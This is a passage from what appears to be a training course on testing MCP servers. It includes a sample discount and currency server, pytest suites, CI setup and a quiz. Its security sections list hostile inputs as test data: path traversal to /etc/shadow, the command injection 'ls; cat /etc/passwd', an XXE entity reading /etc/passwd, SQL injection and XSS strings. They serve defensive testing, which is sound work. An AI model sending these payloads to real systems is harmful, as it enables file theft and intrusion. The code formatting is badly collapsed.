                "should_not_contain": ["<img", "onerror", "alert"]
        }

        ,
        {
        "name": "LDAP Injection",
            "input": "admin*",
            "should_not_contain": ["*"] # Wildcards should be escaped
        }

        ,
        {
        "name": "XML Injection",
            "input": "<?xml version='1.0'?><!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]>",
            "should_not_contain": ["<!ENTITY", "SYSTEM"]
        }

        ] for test in test_cases: response=client.call_tool("process_input", {
            "data": test["input"]
        }) result_text=json.dumps(response) for dangerous_string in test["should_not_contain"]: assert dangerous_string not in result_text,
        \
 f"{test['name']}: Dangerous string '{dangerous_string}' not sanitized"

Sample Malicious Payloads

 // 1. Path Traversal Attempt

            {

            "name": "read_file",
            "arguments": {
                "path": "../../../../etc/shadow"
            }
        }

        // 2. Command Injection
            {

            "name": "execute_command",
            "arguments": {
                "command": "ls; cat /etc/passwd"
            }
        }

        // 3. SQL Injection
            {

            "name": "search_users",
            "arguments": {
                "query": "' OR '1'='1' --"
            }
        }

        // 4. Buffer Overflow Attempt
            {

            "name": "process_data",
            "arguments": {
                "data": "A" * 1000000
            }
        }

        // 5. Resource Exhaustion
            {

            "name": "calculate",
            "arguments": {
                "iterations": 999999999999
            }
        }

🧪 Security Test Design

Scenario:Your MCP server has a "database_query" tool that executes SQL queries.

Task:Design 5 security tests covering:

SQL injection prevention
Unauthorized table access
Query timeout enforcement
Dangerous SQL command blocking (DROP, DELETE ALL)
Information disclosure prevention

Module 3.1

Hands-On Project Setup

Project Overview

We're going to build and test a real MCP server with two tools:

calculate_discount:Calculate discounted prices
currency_converter:Convert between currencies

Project Structure

mcp-discount-server/ ├── src/ │ ├── server.py # Main MCP server │ ├── tools/ │ │ ├── __init__.py │ │ ├── discount.py # Discount calculator tool │ │ └── currency.py # Currency converter tool │ └── config.py # Configuration ├── tests/ │ ├── __init__.py │ ├── test_server.py # Server tests │ ├── test_discount.py # Discount tool tests │ ├── test_currency.py # Currency tool tests │ ├── test_contract.py # Contract tests │ ├── test_performance.py # Performance tests │ └── test_security.py # Security tests ├── requirements.txt ├── pytest.ini └── README.md

Dependencies

# requirements.txt mcp>=0.1.0 pytest>=7.4.0 pytest-asyncio>=0.21.0 jsonschema>=4.19.0 aiohttp>=3.8.0 requests>=2.31.0

Server Implementation (Python)

Main Server (src/server.py)

"" "
 MCP Discount & Currency Server A sample MCP server demonstrating tool implementation and testing "" "


        from mcp.server import Server from mcp.types import Tool,
        TextContent import json # Import our tools from tools.discount import calculate_discount from tools.currency import convert_currency # Initialize MCP server server=Server("discount-currency-server") @server.list_tools() async def list_tools() ->list[Tool]: "" "
 List all available tools This is called during capability negotiation "" "
 return [ Tool(name="calculate_discount",
            description="Calculate discounted price based on original price and discount percentage",
            inputSchema= {

                "type": "object",
                "properties": {
                    "original_price": {
                        "type": "number",
                        "description": "Original price before discount",
                        "minimum": 0
                    }

                    ,
                    "discount_percent": {
                        "type": "number",
                        "description": "Discount percentage (0-100)",
                        "minimum": 0,
                        "maximum": 100
                    }
                }

                ,
                "required": ["original_price", "discount_percent"]

            }),
        Tool(name="currency_converter",
            description="Convert amount from one currency to another",
            inputSchema= {

                "type": "object",
                "properties": {
                    "amount": {
                        "type": "number",
                        "description": "Amount to convert",
                        "minimum": 0
                    }

                    ,
                    "from_currency": {
                        "type": "string",
                        "description": "Source currency code (e.g., USD)",
                        "pattern": "^[A-Z]{3}$"
                    }

                    ,
                    "to_currency": {
                        "type": "string",
                        "description": "Target currency code (e.g., EUR)",
                        "pattern": "^[A-Z]{3}$"
                    }
                }

                ,
                "required": ["amount", "from_currency", "to_currency"]
            })] @server.call_tool() async def call_tool(name: str, arguments: dict) ->list[TextContent]: "" "
 Execute a tool with given arguments "" "

        # Route to appropriate tool handler if name=="calculate_discount": result=calculate_discount(arguments["original_price"],
            arguments["discount_percent"]) return [TextContent(type="text", text=result)] elif name=="currency_converter": result=convert_currency(arguments["amount"],
            arguments["from_currency"],
            arguments["to_currency"]) return [TextContent(type="text", text=result)] else: raise ValueError(f"Unknown tool: {name}") async def main(): "" "Start the MCP server" ""
        from mcp.server.stdio import stdio_server async with stdio_server() as (read_stream, write_stream): await server.run(read_stream,
            write_stream,
            server.create_initialization_options()) if __name__=="__main__": import asyncio asyncio.run(main())

Discount Tool (src/tools/discount.py)

"" "
 Discount calculation tool "" "

        def calculate_discount(original_price: float, discount_percent: float) ->str: "" "
 Calculate discounted price Args: original_price: Original price before discount discount_percent: Discount percentage (0-100) Returns: Formatted string with discounted price Raises: ValueError: If inputs are invalid "" "

        # Input validation if original_price < 0: raise ValueError("Original price cannot be negative") if discount_percent < 0 or discount_percent>100: raise ValueError("Discount percent must be between 0 and 100") # Calculate discount discount_amount=original_price * (discount_percent / 100) final_price=original_price - discount_amount # Format response return (f"Discounted price: ${final_price:.2f} "
            f"({discount_percent}% off ${original_price:.2f})"
        )

Currency Tool (src/tools/currency.py)

"" "
 Currency conversion tool Note: Uses mock exchange rates for demo purposes "" "


        # Mock exchange rates (relative to USD) EXCHANGE_RATES= {
            "USD": 1.0,
                "EUR": 0.85,
                "GBP": 0.73,
                "JPY": 110.0,
                "CAD": 1.25,
                "AUD": 1.35,
        }

        def convert_currency(amount: float, from_currency: str, to_currency: str) ->str: "" "
 Convert amount between currencies Args: amount: Amount to convert from_currency: Source currency code (e.g., "USD") to_currency: Target currency code (e.g., "EUR") Returns: Formatted string with converted amount Raises: ValueError: If currency codes are invalid "" "

        # Input validation if amount < 0: raise ValueError("Amount cannot be negative") if from_currency not in EXCHANGE_RATES: raise ValueError(f"Unsupported currency: {from_currency}") if to_currency not in EXCHANGE_RATES: raise ValueError(f"Unsupported currency: {to_currency}") # Convert to USD first,
        then to target currency amount_in_usd=amount / EXCHANGE_RATES[from_currency] converted_amount=amount_in_usd * EXCHANGE_RATES[to_currency] # Format response return (f"{amount:.2f} {from_currency} = "
            f"{converted_amount:.2f} {to_currency}"
        )

✅ Setup Complete

You now have a working MCP server ! In the next sections, we'll write comprehensive tests for it.

Module 3.2

Manual Testing Steps

Testing the MCP Server Manually

Before automating tests, let's manually verify the server works correctly.

1. Start the Server

$ cd mcp-discount-server $ python src/server.py

2. Test Tool Discovery

Request: List Available Tools

 {
            "jsonrpc": "2.0",
                "id": 1,
                "method": "tools/list"
        }

Expected Response:

 {

            "jsonrpc": "2.0",
            "id": 1,
            "result": {
                "tools": [ {

                    "name": "calculate_discount",
                    "description": "Calculate discounted price...",
                    "inputSchema": {
                        /* schema */
                    }
                }

                ,
                {

                "name": "currency_converter",
                "description": "Convert amount...",
                "inputSchema": {
                    /* schema */
                }
            }

            ]
        }
        }

3. Test Discount Calculator

Test Case 1: Valid Discount

 // Request

            {

            "jsonrpc": "2.0",
            "id": 2,
            "method": "tools/call",
            "params": {

                "name": "calculate_discount",
                "arguments": {
                    "original_price": 100.00,
                        "discount_percent": 20
                }
            }
        }

        // Expected Response
            {

            "jsonrpc": "2.0",
            "id": 2,
            "result": {
                "content": [ {
                    "type": "text",
                        "text": "Discounted price: $80.00 (20% off $100.00)"
                }

                ]
            }
        }

Test Case 2: Invalid Discount (> 100)

 // Request

            {

            "jsonrpc": "2.0",
            "id": 3,
            "method": "tools/call",
            "params": {

                "name": "calculate_discount",
                "arguments": {
                    "original_price": 100.00,
                        "discount_percent": 150
                }
            }
        }

        // Expected Response
            {

            "jsonrpc": "2.0",
            "id": 3,
            "error": {

                "code": -32602,
                "message": "Invalid params",
                "data": {
                    "details": "Discount percent must be between 0 and 100"
                }
            }
        }

4. Test Currency Converter

Test Case 1: USD to EUR

 // Request

            {

            "jsonrpc": "2.0",
            "id": 4,
            "method": "tools/call",
            "params": {

                "name": "currency_converter",
                "arguments": {
                    "amount": 100.00,
                        "from_currency": "USD",
                        "to_currency": "EUR"
                }
            }
        }

        // Expected Response
            {

            "jsonrpc": "2.0",
            "id": 4,
            "result": {
                "content": [ {
                    "type": "text",
                        "text": "100.00 USD = 85.00 EUR"
                }

                ]
            }
        }

Test Case 2: Invalid Currency Code

 // Request

            {

            "jsonrpc": "2.0",
            "id": 5,
            "method": "tools/call",
            "params": {

                "name": "currency_converter",
                "arguments": {
                    "amount": 100.00,
                        "from_currency": "USD",
                        "to_currency": "XYZ" // Invalid currency
                }
            }
        }

        // Expected Response
            {

            "jsonrpc": "2.0",
            "id": 5,
            "error": {

                "code": -32602,
                "message": "Invalid params",
                "data": {
                    "details": "Unsupported currency: XYZ"
                }
            }
        }

Manual Testing Checklist

Test	Status	Notes
Server starts successfully	✓ / ✗
Tools/list returns 2 tools	✓ / ✗
Discount: Valid input works	✓ / ✗
Discount: Negative price fails	✓ / ✗
Discount:>100% fails	✓ / ✗
Currency: Valid conversion works	✓ / ✗
Currency: Invalid code fails	✓ / ✗
Non-existent tool returns error	✓ / ✗

🧪 Manual Testing Exercise

Task:Manually test the following scenarios and document results:

Calculate discount with 0% discount
Calculate discount with 100% discount
Convert 0 USD to EUR
Convert same currency (USD to USD)
Call a tool that doesn't exist
Send malformed JSON

For each test, record: input, expected output, actual output, pass/fail

Module 3.3

Test Automation Implementation

Automated Test Suite

Now let's automate our tests using Pytest.

Test Configuration (pytest.ini)

[pytest] testpaths=tests python_files=test_*.py python_classes=Test* python_functions=test_* asyncio_mode=auto markers=unit: Unit tests integration: Integration tests security: Security tests performance: Performance tests

Test Fixtures (tests/conftest.py)

"" "
 Pytest fixtures for MCP server testing "" "
 import pytest from mcp.client import Client import asyncio @pytest.fixture async def mcp_client(): "" "Create MCP client connected to test server" ""
        client=Client() await client.connect() yield client await client.disconnect() @pytest.fixture def sample_discount_params(): "" "Sample valid parameters for discount tool" ""

        return {
            "original_price": 100.00,
                "discount_percent": 20
        }

        @pytest.fixture def sample_currency_params(): "" "Sample valid parameters for currency tool" ""

        return {
            "amount": 100.00,
                "from_currency": "USD",
                "to_currency": "EUR"
        }

Functional Tests (tests/test_discount.py)

"" "
 Functional tests for discount calculator tool "" "
 import pytest @pytest.mark.unit async def test_calculate_discount_valid_input(mcp_client, sample_discount_params): "" "Test discount calculation with valid inputs" ""
        result=await mcp_client.call_tool("calculate_discount",
            sample_discount_params) assert "result" in result assert "Discounted price: $80.00" in result["result"]["content"][0]["text"] @pytest.mark.unit async def test_calculate_discount_zero_percent(mcp_client): "" "Test with 0% discount" ""

        result=await mcp_client.call_tool("calculate_discount",
            {
            "original_price": 100.00, "discount_percent": 0
        }) assert "Discounted price: $100.00" in result["result"]["content"][0]["text"] @pytest.mark.unit async def test_calculate_discount_hundred_percent(mcp_client): "" "Test with 100% discount" ""

        result=await mcp_client.call_tool("calculate_discount",
            {
            "original_price": 100.00, "discount_percent": 100
        }) assert "Discounted price: $0.00" in result["result"]["content"][0]["text"] @pytest.mark.unit async def test_calculate_discount_negative_price(mcp_client): "" "Test that negative price returns error" ""

        with pytest.raises(ValueError, match="cannot be negative"): await mcp_client.call_tool("calculate_discount",
            {
            "original_price": -50.00, "discount_percent": 20
        }) @pytest.mark.unit async def test_calculate_discount_invalid_percent(mcp_client): "" "Test that discount > 100 returns error" ""

        with pytest.raises(ValueError, match="must be between 0 and 100"): await mcp_client.call_tool("calculate_discount",
            {
            "original_price": 100.00, "discount_percent": 150
        }) @pytest.mark.unit async def test_calculate_discount_missing_field(mcp_client): "" "Test that missing required field returns error" ""

        with pytest.raises(Exception): # Should be validation error await mcp_client.call_tool("calculate_discount",
            {
            "original_price": 100.00
        }

        # Missing discount_percent) @pytest.mark.unit @pytest.mark.parametrize("price,discount,expected", [ (100, 10, "$90.00"),
            (50.50, 25, "$37.88"),
            (999.99, 33, "$670.19"),
            (0.01, 50, "$0.01"),
            ]) async def test_calculate_discount_parametrized(mcp_client, price, discount, expected): "" "Test multiple discount scenarios" ""

        result=await mcp_client.call_tool("calculate_discount",
            {
            "original_price": price, "discount_percent": discount
        }) assert expected in result["result"]["content"][0]["text"]

Contract Tests (tests/test_contract.py)

"" "
 Contract tests for MCP server "" "
 import pytest import jsonschema @pytest.mark.integration async def test_tools_list_contract(mcp_client): "" "Verify tools/list response matches contract" ""

        expected_schema= {

            "type": "object",
            "properties": {
                "tools": {

                    "type": "array",
                    "minItems": 2,
                    "items": {

                        "type": "object",
                        "properties": {
                            "name": {
                                "type": "string"
                            }

                            ,
                            "description": {
                                "type": "string"
                            }

                            ,
                            "inputSchema": {
                                "type": "object"
                            }
                        }

                        ,
                        "required": ["name",
                        "inputSchema"]
                    }
                }
            }

            ,
            "required": ["tools"]
        }

        result=await mcp_client.list_tools() jsonschema.validate(result, expected_schema) @pytest.mark.integration async def test_tool_response_structure(mcp_client): "" "Verify tool call response structure" ""

        result=await mcp_client.call_tool("calculate_discount",
            {
            "original_price": 100, "discount_percent": 20
        }) # Check JSON-RPC structure assert "jsonrpc" in result assert result["jsonrpc"]=="2.0"
        assert "id" in result assert "result" in result # Check result structure assert "content" in result["result"] assert isinstance(result["result"]["content"], list) assert len(result["result"]["content"])>0 assert result["result"]["content"][0]["type"]=="text"
        assert "text" in result["result"]["content"][0]

Performance Tests (tests/test_performance.py)

"" "
 Performance tests for MCP server "" "
 import pytest import asyncio import time import numpy as np @pytest.mark.performance async def test_response_time(mcp_client): "" "Test that response time is under 100ms" ""

        start=time.time() await mcp_client.call_tool("calculate_discount",
            {
            "original_price": 100, "discount_percent": 20
        }) end=time.time() response_time=(end - start) * 1000 # Convert to ms assert response_time < 100,
        f"Response time {response_time}ms exceeds 100ms"

        @pytest.mark.performance async def test_concurrent_requests(mcp_client): "" "Test server handles 10 concurrent requests" ""

        async def make_request(): return await mcp_client.call_tool("calculate_discount",
            {
            "original_price": 100, "discount_percent": 20
        }) # Execute 10 concurrent requests tasks=[make_request() for _ in range(10)] results=await asyncio.gather(*tasks) # Verify all succeeded assert len(results)==10 for result in results: assert "result" in result @pytest.mark.performance async def test_latency_percentiles(mcp_client): "" "Measure p50, p95, p99 latency" ""

        latencies=[] for _ in range(100): start=time.time() await mcp_client.call_tool("calculate_discount",
            {
            "original_price": 100, "discount_percent": 20
        }) end=time.time() latencies.append((end - start) * 1000) p50=np.percentile(latencies, 50) p95=np.percentile(latencies, 95) p99=np.percentile(latencies, 99) print(f"\nLatency percentiles:") print(f"  p50: {p50:.2f}ms") print(f"  p95: {p95:.2f}ms") print(f"  p99: {p99:.2f}ms") assert p95 < 100,
        f"p95 latency {p95}ms exceeds target"
        assert p99 < 500,
        f"p99 latency {p99}ms exceeds target"

Security Tests (tests/test_security.py)

"" "
 Security tests for MCP server "" "
 import pytest @pytest.mark.security async def test_sql_injection_in_params(mcp_client): "" "Test SQL injection attempts are handled safely" ""

        sql_injections=[ "'; DROP TABLE users; --",
        "1' OR '1'='1",
        "admin' --",
        ] for injection in sql_injections: # Should handle gracefully - either reject or sanitize try: result=await mcp_client.call_tool("calculate_discount",
            {
            "original_price": injection, "discount_percent": 20
        }) # If it succeeds,
        check result doesn't contain injection
 assert "DROP TABLE" not in str(result) except Exception: # Error is acceptable - server rejected malicious input pass @pytest.mark.security async def test_large_payload(mcp_client): "" "Test server handles large payloads safely" ""

        large_value="X" * 1_000_000 with pytest.raises(Exception): # Should reject or timeout await mcp_client.call_tool("calculate_discount",
            {
            "original_price": large_value, "discount_percent": 20
        })

Running the Tests

# Run all tests $ pytest # Run specific test file $ pytest tests/test_discount.py # Run tests by marker $ pytest -m unit $ pytest -m security # Run with verbose output $ pytest -v # Run with coverage $ pytest --cov=src --cov-report=html

🧪 Your Turn: Write Tests

Task:Write test cases for the currency_converter tool covering:

Valid conversion (USD to EUR)
Same currency conversion (USD to USD)
Invalid currency code
Negative amount
Zero amount
Missing required field

Use the discount tests as a template !

Module 4

Advanced SDET Architecture

Observability Design

Production MCP servers need comprehensive observability: logs, metrics, and traces.

Logging Strategy

import logging import json from datetime import datetime # Structured logging for MCP server logger=logging.getLogger("mcp_server") def log_tool_call(tool_name: str, params: dict, duration_ms: float, success: bool): "" "Log structured tool call data" ""

        log_entry= {
            "timestamp": datetime.utcnow().isoformat(),
                "event": "tool_call",
                "tool": tool_name,
                "params": params,
                "duration_ms": duration_ms,
                "success": success
        }

        logger.info(json.dumps(log_entry))

Metrics Collection

from prometheus_client import Counter,
        Histogram # Define metrics tool_calls_total=Counter('mcp_tool_calls_total',
            'Total tool calls',
            ['tool_name', 'status']) tool_duration_seconds=Histogram('mcp_tool_duration_seconds',
            'Tool execution duration',
            ['tool_name']) # Use in code tool_calls_total.labels(tool_name="calculate_discount", status="success").inc() tool_duration_seconds.labels(tool_name="calculate_discount").observe(0.05)

CI/CD Integration

GitHub Actions Workflow

# .github/workflows/test.yml name: MCP Server Tests on: [push,
        pull_request] jobs: test: runs-on: ubuntu-latest steps: - uses: actions/checkout@v2 - name: Set up Python uses: actions/setup-python@v2 with: python-version: '3.11'

        - name: Install dependencies run: | pip install -r requirements.txt pip install pytest pytest-cov - name: Run unit tests run: pytest -m unit --cov=src - name: Run integration tests run: pytest -m integration - name: Run security tests run: pytest -m security - name: Check coverage run: pytest --cov=src --cov-fail-under=80 - name: Contract tests (breaking change detection) run: pytest tests/test_contract.py --strict

Test Automation Architecture

Test Automation Architecture ════════════════════════════ ┌─────────────────────────────────────────────┐ │ CI/CD Pipeline │ │ │ │ ┌──────────┐ ┌────────────┐ ┌────────┐ │ │ │ Commit │ → │ Run Tests │ → │ Deploy │ │ │ └──────────┘ └──────┬─────┘ └────────┘ │ └────────────────────────│────────────────────┘ │ ┌──────────────────┴──────────────────┐ │ │ ┌─────▼─────┐ ┌─────▼────┐ │ Contract │ │ Unit │ │ Tests │ │ Tests │ └─────┬─────┘ └─────┬────┘ │ │ ┌─────▼─────┐ ┌─────▼────┐ │Integration│ │Performance│ │ Tests │ │ Tests │ └─────┬─────┘ └─────┬────┘ │ │ └──────────┬──────────┬───────────────┘ │ │ ┌────────▼──────────▼───────┐ │ Test Reports │ │ • Coverage • Results │ │ • Metrics │ └───────────────────────────┘

Chaos Testing Strategies

Test server resilience under failure conditions:

import pytest import asyncio @pytest.mark.chaos async def test_server_restart_resilience(mcp_client): "" "Test client handles server restart" ""

        # Make initial call result1=await mcp_client.call_tool("calculate_discount", {
            ...

        }) assert "result" in result1 # Simulate server restart await server.restart() await asyncio.sleep(1) # Reconnect and retry await mcp_client.reconnect() result2=await mcp_client.call_tool("calculate_discount", {
            ...
        }) assert "result" in result2 @pytest.mark.chaos async def test_network_partition(mcp_client): "" "Test behavior during network issues" ""

        # Inject network delay with network_delay(500): # 500ms delay result=await mcp_client.call_tool("calculate_discount", {
            ...
        }) # Should still succeed but be slower @pytest.mark.chaos async def test_resource_exhaustion(mcp_client): "" "Test server under resource pressure" ""

        # Fill server memory with high_memory_pressure(): # Server should still respond result=await mcp_client.call_tool("calculate_discount", {
            ...
        }) assert "result" in result or "error" in result

Version Compatibility Testing

def test_backward_compatibility(): "" "Test new server version with old client" ""

        # V1 client v1_client=MCPClient(protocol_version="1.0") # V2 server (with new optional fields) v2_server=MCPServer(protocol_version="2.0") # V1 client should still work with V2 server result=v1_client.call_tool("calculate_discount",
            {
            "original_price": 100, "discount_percent": 20
        }

        # Not using new V2 fields) assert "result" in result

🎯 Key Takeaway

Advanced testing goes beyond functional validation. Focus on observability, automation, resilience, and maintaining compatibility as your system evolves.

Final Assessment

Knowledge Check Quiz

Test your understanding of MCP server testing. Select the best answer for each question.

Question 1 of 20

What is the primary difference between MCP and REST APIs?

A) MCP uses JSON while REST uses XML

B) MCP is stateful with bidirectional sessions, REST is typically stateless

C) MCP is faster than REST

D) MCP doesn't support error handling

Question 2 of 20

Which JSON-RPC error code indicates "Invalid params" ?

A) -32700

B) -32600

C) -32602

D) -32603

Question 3 of 20

What are the three primary MCP primitives?

A) GET, POST, DELETE

B) Tools, Resources, Prompts

C) Client, Server, Transport

D) Request, Response, Error

Question 4 of 20

In contract testing, which change is considered breaking?

A) Adding a new optional parameter

B) Adding a new tool

C) Adding a required parameter to an existing tool

D) Improving error messages

Question 5 of 20

What is the recommended p95 latency target for MCP tool calls?

A) < 10ms

B) < 100ms

C) < 1000ms

D) < 5000ms

Question 6 of 20

Which transport mechanism does MCP NOT support?

A) stdio

B) HTTP+SSE

C) WebSocket

D) gRPC

Question 7 of 20

In JSON Schema validation for MCP tools, which field is optional in the tool definition?

A) name

B) inputSchema

C) description

D) All fields are required

Question 8 of 20

What is prompt injection in the context of MCP security testing?

A) Injecting SQL commands into database queries

B) Manipulating tool parameters to execute unintended commands

C) Adding extra prompts to the MCP server

D) Overloading the server with too many prompts

Question 9 of 20

During capability negotiation, what should a client do if the server doesn't support a required capability?

A) Proceed anyway and hope for the best

B) Fail gracefully and inform the user

C) Try to force the server to support it

D) Automatically downgrade to HTTP

Question 10 of 20

What test type should you use to verify that removing a tool doesn't break existing clients?

A) Unit tests

B) Performance tests

C) Contract tests

D) Security tests

Question 11 of 20

In the MCP protocol, what does "listChanged: true" in capabilities mean?

A) The server can change its list of items

B) The server will notify clients when the list changes

C) The list has already changed

D) Clients must poll for list changes

Question 12 of 20

What is the primary purpose of fuzzing in MCP security testing?

A) To test server performance under load

B) To find unexpected crashes or vulnerabilities with random inputs

C) To test network latency

D) To validate JSON schema compliance

Question 13 of 20

Which pytest marker would you use for tests that validate the server can handle 100+concurrent requests?

A) @pytest.mark.unit

B) @pytest.mark.integration

C) @pytest.mark.performance

D) @pytest.mark.security

Question 14 of 20

What is the N × M problem that MCP solves?

A) N AI applications × M tools=N×M custom integrations

B) N servers × M clients=N×M connections

C) N requests × M responses=N×M data transfer

D) N databases × M queries=N×M performance issues

Question 15 of 20

When testing tool schema validation, what should happen if a required field is missing?

A) Server should use a default value

B) Server should return error code -32602 (Invalid params)

C) Server should proceed with null value

D) Server should ask the client for the missing field

Question 16 of 20

What is the purpose of chaos testing in MCP server validation?

A) To create random test data

B) To test server resilience under failure conditions

C) To disorder test execution order

D) To test without any test plan

Question 17 of 20

In observability design, what are the three pillars you should implement?

A) Frontend, Backend, Database

B) Logs, Metrics, Traces

C) Unit, Integration, E2E tests

D) Client, Server, Transport

Question 18 of 20

Which test scenario best validates concurrent tool invocation handling?

A) Calling one tool 100 times sequentially

B) Calling the same tool 20 times simultaneously

C) Calling different tools one at a time

D) Testing with a single client connection

Question 19 of 20

What should you verify in a backward compatibility test?

A) Old server works with new client

B) New server works with old client

C) Both servers and clients are the same version

D) The database schema hasn't changed

Question 20 of 20

When should you use snapshot testing for MCP servers?

A) To capture performance metrics over time

B) To detect unintended changes in API response structure

C) To take screenshots of the UI

D) To backup the server state